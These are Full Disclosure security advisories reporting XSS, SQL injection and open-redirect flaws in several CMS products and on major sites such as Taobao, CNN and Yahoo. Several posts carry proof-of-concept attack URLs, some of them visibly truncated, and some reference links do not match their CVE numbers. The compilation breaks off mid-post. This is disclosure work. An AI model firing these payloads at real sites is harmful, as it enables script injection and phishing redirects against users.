[FD] CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

*CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site
Scripting) Security Vulnerabilities*





Exploit Title:  OptimalSite CMS /display_dialog.php image Parameter XSS
Security Vulnerability
Vendor: OptimalSite
Product: OptimalSite Content Management System (CMS)
Vulnerable Versions: V.1 V2.4
Tested Version: V.1 V2.4
Advisory Publication: Feb 2, 2015
Latest Update: Feb 2, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9562
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Advisory Details:*

*(1) Vendor & Product Description*

*Vendor:*
OptimalSite


*Product & Version:*
OptimalSite Content Management System (CMS)
V.1
V2.4


*Vendor URL & Download:*
http://www.optimalsite.com/en/



*Product Description:*
“Content management system OptimalSite is an online software package that
enables the management of information published on a website.”

“OptimalSite consists of the system core and integrated modules, which
allow expanding website possibilities and functionality. You may select a
set of modules that suits your needs best.”





*(2) Vulnerability Details:*
OptimalSite Content Management System (CMS) has a security problem. It can
be exploited by XSS attacks.

*(2.1) *The vulnerability occurs at “display_dialog.php” page with “image”
parameter.







*References:*
http://tetraph.com/security/cves/cve-2014-9562-optimalsite-content-management-system-cms-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9562-optimalsite-content.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9562
https://security-tracker.debian.org/tracker/CVE-2014-9562
http://www.cvedetails.com/cve/CVE-2014-9562/
http://www.security-database.com/detail.php?alert=CVE-2014-9562
http://packetstormsecurity.com/files/cve/CVE-2014-9562
http://www.pentest.it/cve-2014-9562.html
http://www.naked-security.com/cve/CVE-2014-9562/
http://007software.net/cve-2014-9562/
https://security-tracker.debian.org/tracker/CVE-2014-9562








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS
Product: SnipSnap
Vulnerable Versions: 0.5.2a  1.0b1  1.0b2
Tested Version: 0.5.2a  1.0b1  1.0b2
Advisory Publication: Jan 30, 2015
Latest Update: Jan 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9559
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





Advisory Details:


(1) Vendor & Product Description

Vendor:
SnipSnap

Product & Version:
SnipSnap
0.5.2a
1.0b1
1.0b2


Vendor URL & Download:
http://snipsnap.org

Product Description:
"SnipSnap is a user friendly content management system with features such
as wiki and weblog. "







(2) Vulnerability Details:
SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at "snipsnap-search?" page with "query"
parameter.






References:
http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559
https://security-tracker.debian.org/tracker/CVE-2014-9559
http://www.cvedetails.com/cve/CVE-2014-9559/
http://www.security-database.com/detail.php?alert=CVE-2014-9559
http://packetstormsecurity.com/files/cve/CVE-2014-9559
http://www.pentest.it/cve-2014-9559.html
http://www.naked-security.com/cve/CVE-2014-9559/
http://007software.net/cve-2014-9559/
https://security-tracker.debian.org/tracker/CVE-2014-9559






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS & Open Redirect Security Vulnerabilities

[Jing Wang]

*Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS
& Open Redirect Security Vulnerabilities*

*Domains Basic:*
Alibaba Taobao, AliExpress, Tmall are the top three online shopping
websites belonging to Alibaba.

Vulnerability Discover:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/



*(1) Domains Description:*


*(1.1) http://www.taobao.com *

“Taobao is a Chinese website for online shopping similar to eBay and Amazon
that is operated in China by Alibaba Group.” (Wikipedia)

“With around 760 million product listings as of March 2013, Taobao
Marketplace is one of the world’s top 10 most visited websites according to
Alexa. For the year ended March 31, 2013, the combined gross merchandise
volume (GMV) of Taobao Marketplace and Tmall.com exceeded 1 trillion yuan.”
(Wikipedia)

Alexa ranking 9 at 10:40 am Thursday, 22 January 2015 (GMT+8).


*(1.2) http://aliexpress.com *

"Launched in 2010, AliExpress.com is an online retail service made up of
mostly small Chinese businesses offering products to international online
buyers. It is the most visited e-commerce website in Russia" (Wikipedia)


*(1.3) http://www.tmall.com *

"Taobao Mall, is a Chinese-language website for business-to-consumer (B2C)
online retail, spun off from Taobao, operated in the People's Republic of
China by Alibaba Group. It is a platform for local Chinese and
international businesses to sell brand name goods to consumers in mainland
China, Hong Kong, Macau and Taiwan." (Wikipedia)





*(2) Vulnerability descriptions:*
Alibaba Taobao AliExpress Tmall online electronic shopping website has a
security problem. It can be exploited by XSS and Covert Redirect attacks.





*(3) Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website
XSS Security Vulnerabilities*

The vulnerability can be exploited without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (8.0.7601) in Windows 7.



*(3.1) Alibaba Taobao Online Electronic Shopping Website (Taobao.com ) XSS
(cross site scripting) Security Vulnerability*

The vulnerabilities occur at “writecookie.php?" page with "ck" parameter,
e.g
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw&redirect=0

*POC Code:*
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw"-->'-alert(/tetraph/
)-'";&redirect=0


*POC Video:*
https://www.youtube.com/watch?v=cLzKxZ74i6Q&feature=youtu.be
*Blog Details:*
http://securityrelated.blogspot.com/2015/01/alibaba-taobao-online-electronic.html




*(3.2) Alibaba AliExpress Online Electronic Shopping Website
(Aliexpress.com) XSS Security Vulnerabilities*

The vulnerabilities occur at “landing.php?" page with "cateid" "fromapp"
parameters, e.g
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=3&fromapp=

*POC Code:*
/' ">
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6&fromapp=/'
">
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6/'
">

[FD] CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

*CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple XSS Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9557
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





*Advisory Details:*


*(1) Vendor & Product Description*

*Vendor: *Smartwebsites

*Product & Version:* SmartCMS v.2

*Vendor URL & Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

*Product Description: *
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”



*(2) Vulnerability Details:*

SmartCMS v.2 has a security problem. It can be exploited by XSS attacks.

*(2.1) *The first vulnerability occurs at “index.php?” page with “pageid”
“lang” multiple parameters.

*(2.2)* The second vulnerability occurs at “sitemap.php?” page with
“pageid” “lang” multiple parameters.







*References:*
http://www.tetraph.com/security/cves/cve-2014-9557-smartcms-multiple-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9557
https://security-tracker.debian.org/tracker/CVE-2014-9557
http://www.cvedetails.com/cve/CVE-2014-9557/
http://www.security-database.com/detail.php?alert=CVE-2014-9557
http://packetstormsecurity.com/files/cve/CVE-2014-9557
http://www.pentest.it/cve-2014-9557.html
http://www.naked-security.com/cve/CVE-2014-9557/
http://007software.net/cve-2014-9557/








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities

[Jing Wang]

*CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple SQL Injection Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: CVE-2014-9558
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor & Product Description*

*Vendor:* Smartwebsites

*Product & Version:* SmartCMS v.2

*Vendor URL & Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

*Product Description:*
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”




*(2) Vulnerability Details:*

SmartCMS v.2 has a security vulnerability. It can be exploited by SQL
Injection attacks.

*(2.1) *The first vulnerability occurs at “index.php?” page with “pageid”,
“lang” multiple parameters.

*(2.2)* The second vulnerability occurs at “sitemap.php?” page with
“pageid”, “lang” multiple parameters.







*References:*
http://www.tetraph.com/security/cves/cve-2014-9558-smartcms-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9558
https://security-tracker.debian.org/tracker/CVE-2014-9558
http://www.cvedetails.com/cve/CVE-2014-9558/
http://www.security-database.com/detail.php?alert=CVE-2014-9558
http://packetstormsecurity.com/files/cve/CVE-2014-9558
http://www.pentest.it/cve-2014-9558.html
http://www.naked-security.com/cve/CVE-2014-9558/
http://007software.net/cve-2014-9558/







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9561 Softbb.net SoftBB XSS (Cross-Site Scripting) Security Vulnerability

[Jing Wang]

CVE-2014-9561  Softbb.net SoftBB XSS (Cross-Site Scripting) Security
Vulnerability




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
XSS
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9561
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by XSS Attacks.


*(2.1) *The vulnerability occurs at “/redir_last_post_list.php" page, with
“&post” parameter.






*References:*
http://tetraph.com/security/cves/cve-2014-9561-softbb-net-softbb-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9561
http://www.cvedetails.com/cve/CVE-2006-4593/







--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9560 Softbb.net SoftBB SQL Injection Security Vulnerability

[Jing Wang]

*CVE-2014-9560  Softbb.net SoftBB SQL Injection Security Vulnerability*




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
SQL Injection
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') (CWE-89)
CVE Reference: CVE-2014-9560
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]






*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by SQL Injection attacks.


*(2.1) *The vulnerability occurs at “/redir_last_post_list.php" page, with
“&post” parameter.




*References:*
http://tetraph.com/security/cves/cve-2014-9560-softbb-net-softbb-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9560
http://www.cvedetails.com/cve/CVE-2006-1327/








--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CNN cnn.com Travel XSS and ADS Open Redirect Security Vulnerabilities

[Jing Wang]

*CNN Travel.cnn.com  XSS and Ads.cnn.com
 Open Redirect Security Vulnerability*



*Domain:*
http://cnn.com

"CNN is sometimes referred to as CNN/U.S. to distinguish the American
channel from its international sister network, CNN International. As of
August 2010, CNN is available in over 100 million U.S. households.
Broadcast coverage of the U.S. channel extends to over 890,000 American
hotel rooms, as well as carriage on cable and satellite providers
throughout Canada. Globally, CNN programming airs through CNN
International, which can be seen by viewers in over 212 countries and
territories." (Wikipedia)

"As of August 2013, CNN is available to approximately 98,496,000 cable,
satellite and telco television households (86% of households with at least
one television set) in the United States." (Wikipedia)






*Vulnerability Description:*

CNN has a security problem. It cab be exploited by XSS (Cross Site
Scripting) and Open Redirect attacks.

Based on news published, CNN users were hacked based on both Open Redirect
and XSS vulnerabilities.

According to E Hacker News on June 06, 2013, "(@BreakTheSec) came across a
diet spam campaign that leverages the open redirect vulnerability in one of
the top News organization CNN."

After the attack, CNN takes measures to detect Open Redirect
vulnerabilities. The measure is quite good. Almost no links are vulnerable
to Open Redirect attack on CNN's website, now. It takes long time to find a
new Open Redirect vulnerability that is un-patched on its website.

CNN.com was hacked by Open Redirect in 2013. While the XSS attacks happened
in 2007.



*<1>*  "The tweet apparently shows cyber criminals managed to leverage the
open redirect security flaw in the CNN to redirect twitter users to the
Diet spam websites." (E Hacker News)

At the same time, the cybercriminals have also leveraged a similar
vulnerability in a Yahoo domain to trick users into thinking that the links
point to a trusted website.

Yahoo Open Redirect Vulnerabilities:
http://securityrelated.blogspot.sg/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html



*<2>* CNN.com XSS hacked
http://seclists.org/fulldisclosure/2007/Aug/216







*(1) CNN (cnn.com ) Travel-City Related Links XSS (cross
site scripting) Security Vulnerabilities*



*Domain:*
http://travel.cnn.com/



*Vulnerability Description:*

The vulnerabilities occur at "http://travel.cnn.com/city/all"; pages. All
links under this URL are vulnerable to XSS attacks, e.g
http://travel.cnn.com/city/all/all/washington?page=0%2C1
http://travel.cnn.com/city/all/all/tokyo/all?page=0%2C1


The vulnerability can be exploited without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.


*Poc Code:*
http://travel.cnn.com/city/all/all/tokyo/all' /">
http://travel.cnn.com/city/all/all/bangkok/all' /">


*(1.1) Poc Video:*
https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be

*Blog Details:*
http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-city-related-links.html




*(2) CNN cnn.com  ADS Open Redirect Security Vulnerability *


*Domain:*
http://ads.cnn.com



*Vulnerability Description:*

The vulnerability occurs at "http://ads.cnn.com/event.ng"; page with
"&Redirect" parameter, i.e.
http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fgoogle.com

The vulnerability can be attacked without user login. Tests were performed
on Chrome 32 in Windows 8 and Safari 6.16 in Mac OS X v10.7.


*(2.1)* Use the following tests to illustrate the scenario painted above.

The redirected webpage address is "http://www.tetraph.com/blog";. Suppose
that this webpage is malicious.

*Vulnerable URL:*
http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fcnn.com

*Poc Code:*
http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2ftetraph.com%2Fblog



*(2.1) Poc Video:*
https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-ads-open-redirect-security.html






Those vulnerabilities were reported to CNN in early July by Contact
information from Here.
http://edition.cnn.com/feedback/#cnn_FBKCNN_com








Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.
http://www.tetraph.com/wangjing/






*Blog Details:*
http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-xss-and-ads-open.html








--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-7294 Ex Libris Patron Directory Services (PDS) Open Redirect Security Vulnerability

[Jing Wang]

*CVE-2014-7294  Ex Libris Patron Directory Services (PDS) Open Redirect
Security Vulnerability*



Exploit Title: Ex Libris Patron Directory Services (PDS) Logon Page url
Parameter Open Redirect
Product: Ex Libris Patron Directory Services (PDS)
Vendor: Ex Libris
Vulnerable Versions: 2.1 and probability prior
Tested Version: 2.1
Advisory Publication: DEC 29, 2014
Latest Update: DEC 29, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-7294
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]





*Advisory Details:*

*(1) Vendor URL:*
http://www.exlibrisgroup.org/display/CrossProductCC/PDS+OpenSSO+Integration



*Product Description:*
“Ex Libris is a leading worldwide developer and provider of
high-performance applications for libraries, information centres, and
researchers.”

“Patron Directory Services (PDS) module was provides a seamless single
sign-on (SSO) environment for all Ex Libris products. such as, Aleph,
Metalib, Primo, DigiTool, Rosetta …”

It is one of the largest library management system which used by large
numbers of universities and institutions.





*(2) Vulnerability Details:*

Ex Libris Patron Directory Services (PDS) can be exploited by Open Redirect
Attacks.


*(2.1) *The vulnerability occurs at “PDS” service’s logon page, with “&url”
parameter.






*References:*
http://tetraph.com/security/cves/cve-2014-7294-ex-libris-patron-directory-services-pds-open-redirect-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7294







--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-7293 Ex Libris Patron Directory Services (PDS) XSS (Cross-Site Scripting) Security Vulnerability

[Jing Wang]

*CVE-2014-7293  Ex Libris Patron Directory Services (PDS) XSS (Cross-Site
Scripting) Security Vulnerability*




Exploit Title: Ex Libris Patron Directory Services (PDS) Logon Page url
Parameter XSS
Product: Ex Libris Patron Directory Services (PDS)
Vendor: Ex Libris
Vulnerable Versions: 2.1 and probability prior
Tested Version: 2.1
Advisory Publication: DEC 29, 2014
Latest Update: DEC 29, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7293
Risk Level: Medium
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor URL:*
http://www.exlibrisgroup.org/display/CrossProductCC/PDS+OpenSSO+Integration


*Product Description:*

“Ex Libris is a leading worldwide developer and provider of
high-performance applications for libraries, information centres, and
researchers.”

Patron Directory Services (PDS) module was provides a seamless single
sign-on (SSO) environment for all Ex Libris products. such as, Aleph,
Metalib, Primo, DigiTool, Rosetta …

It is one of the largest library management system which is used by large
numbers of universities and institutions.





*(2) Vulnerability Details:*

However, Patron Directory Services (PDS) can be exploited by XSS Attacks.


*(2.1) *The vulnerability occurs at “PDS” service’s logon page, with “&url”
parameter,






*References:*
http://tetraph.com/security/cves/cve-2014-7293-ex-libris-patron-directory-services-pds-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7293









--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Yahoo Yahoo.com Yahoo.co.jp Open Redirect Security Vulnerabilities

[Jing Wang]

*Yahoo Yahoo.com Yahoo.co.jp  Open Redirect Security
Vulnerabilities*



Though Yahoo lists open redirect vulnerability on its bug bounty program.
However, it seems Yahoo do not take this vulnerability seriously at all.

Multiple Open Redirect vulnerabilities were reported Yahoo. All Yahoo's
responses were "this intended behavior". However, these vulnerabilities
were patched later.

Several other security researcher complained about getting similar
treatment, too.
http://seclists.org/fulldisclosure/2013/Nov/198
http://seclists.org/fulldisclosure/2014/Jan/51
http://seclists.org/fulldisclosure/2014/Feb/119


All Open Redirect Vulnerabilities are intended behavior? If so, why patch
them later?



The vulnerability can be attacked without user login. Tests were performed
on Firefox (33.0) in Ubuntu (14.04) and IE (10.0.9200.16521 ) in Windows 8.




*(1) Yahoo.com Open Redirect*

*Vulnerable URLs:*
http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html

http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com

http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com



*Poc Video:*
https://www.youtube.com/watch?v=k4eFLsTyZkg

*Another Video Published Before:*
https://www.youtube.com/watch?v=GTd1Gkj6OUY


*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html
http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html






*(2) Yahoo.co.jp  Open Redirect*

Use one of webpages for the following tests. The webpage address is "
http://www.inzeed.com/kaleidoscope";. Suppose that this webpage is malicious.

*Vulnerable URL:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp

*POC:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope



*Poc Video:*
https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be

*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html






Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore
http://www.tetraph.com/wangjing






*Blog Details:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8490 TennisConnect COMPONENTS System XSS (Cross-Site Scripting) Security Vulnerability

[Jing Wang]

*CVE-2014-8490  TennisConnect COMPONENTS System XSS (Cross-Site Scripting)
Security Vulnerability*




Exploit Title: TennisConnect "TennisConnect COMPONENTS System" /index.cfm
pid Parameter XSS
Product: TennisConnect COMPONENTS System
Vendor: TennisConnect
Vulnerable Versions: 9.927
Tested Version: 9.927
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8490
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]









*Advisory Details:*


*(1) Vendor URL:*
http://www.tennisconnect.com/products.cfm#Components


*Product Description:*
TennisConnect COMPONENTS
* Contact Manager (online player database)
* Interactive Calendar including online enrollment
* League & Ladder Management through Tencap Tennis
* Group Email (including distribution lists, player reports, unlimited
sending volume and frequency)
* Multi-Administrator / security system with Page Groups
* Member Administration
* MobileBuilder
* Online Tennis Court Scheduler
* Player Matching (Find-a-Game)
* Web Site Builder (hosted web site and editing tools at www. your domain
name .com)




*(2) Vulnerability Details:*

TennisConnect COMPONENTS System is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at "/index.cfm?" page, with "&pid"
parameter.








*References:*
http://tetraph.com/security/cves/cve-2014-8490-tennisconnect-components-system-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8490








--

Wang Jing

School of Physical and Mathematical Sciences

Nanyang Technological University, Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8752 JCE-Tech "Video Niche Script" XSS (Cross-Site Scripting) Security Vulnerability

[Jing Wang]

*CVE-2014-8752 JCE-Tech "Video Niche Script" XSS (Cross-Site Scripting)
Security Vulnerability*



Exploit Title: JCE-Tech "Video Niche Script" /view.php Multiple Parameters
XSS
Product: "Video Niche Script"
Vendor: JCE-Tech
Vulnerable Versions: 4.0
Tested Version: 4.0
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8752
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]




*Advisory Details:*


*(1) Vendor URL:*
http://jce-tech.com/products/


*Product Description:*
"The PHP Video Script instantly creates a niche video site based on
keywords users control via the admin console. The videos are displayed  on
users' site, but streamed from the YouTube servers."




*(2) Vulnerability Details.*

JCE-Tech "Video Niche Script" is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at "view.php" page with "video", "title"
parameters.





*References:*

http://tetraph.com/security/cves/cve-2014-8752-jce-tech-video-niche-script-xss-cross-site-scripting-security-vulnerability/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8752

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

[Jing Wang]

*ESPN espn.go.com  Login & Register Page XSS and Dest
Redirect Privilege Escalation Security Vulnerabilities*





*Domain:*
http://espn.go.com/


*"*As of August 2013, ESPN is available to approximately 97,736,000 pay
television households (85.58% of households with at least one television
set) in the United States.[2]
 In addition to the flagship
channel and its seven related channels in the United States, ESPN
broadcasts in more than 200 countries,[3]
 operating regional
channels in Australia , Brasil
, Latin America
 and the United Kingdom
, and owning a 20% interest in The
Sports Network  (TSN) as
well as its five sister networks and NHL Network
 in Canada
." (Wikipedia)






*Vulnerability description:*

Espn.go.com  has a security problem. It is vulnerable
to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open
